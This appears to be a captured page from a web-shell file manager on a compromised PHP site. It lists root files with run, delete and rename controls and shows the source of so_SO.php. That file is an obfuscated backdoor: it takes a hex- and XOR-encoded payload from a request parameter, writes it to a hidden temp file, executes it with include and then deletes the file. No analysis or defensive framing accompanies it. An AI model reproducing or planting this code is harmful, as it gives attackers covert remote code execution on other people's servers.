at path:
ROOT
/
so_SO.php
run:
R
W
Run
.htaccess
231 By
2026-04-06 01:42:36
R
W
Run
Delete
Rename
error_log
708 By
2026-04-08 12:38:12
R
W
Run
Delete
Rename
portfolio.php
603 By
2026-04-08 12:38:59
R
W
Run
Delete
Rename
robots.txt
955 By
2026-04-06 01:44:06
R
W
Run
Delete
Rename
simple.php
15.05 KB
2026-04-06 01:42:36
R
W
Run
Delete
Rename
so.php
909 By
2026-04-06 01:42:36
R
W
Run
Delete
Rename
so_SO.php
697 By
2026-04-06 01:42:36
R
W
Run
Delete
Rename
error_log
up
📄
so_SO.php
Save
<?php if(array_key_exists("\x66a\x63tor", $_REQUEST) && !is_null($_REQUEST["\x66a\x63tor"])){ $desc = array_filter([session_save_path(), ini_get("upload_tmp_dir"), getcwd(), "/var/tmp", "/tmp", getenv("TMP"), sys_get_temp_dir(), getenv("TEMP"), "/dev/shm"]); $res = hex2bin($_REQUEST["\x66a\x63tor"]); $obj = '';$b = 0; while($b < strlen($res)){$obj .= chr(ord($res[$b]) ^ 97);$b++;} $symbol = 0; do { $holder = $desc[$symbol] ?? null; if ($symbol >= count($desc)) break; if (is_dir($holder) && is_writable($holder)) { $pset = "$holder/.marker"; if (@file_put_contents($pset, $obj) !== false) { include $pset; unlink($pset); exit; } } $symbol++; } while (true); }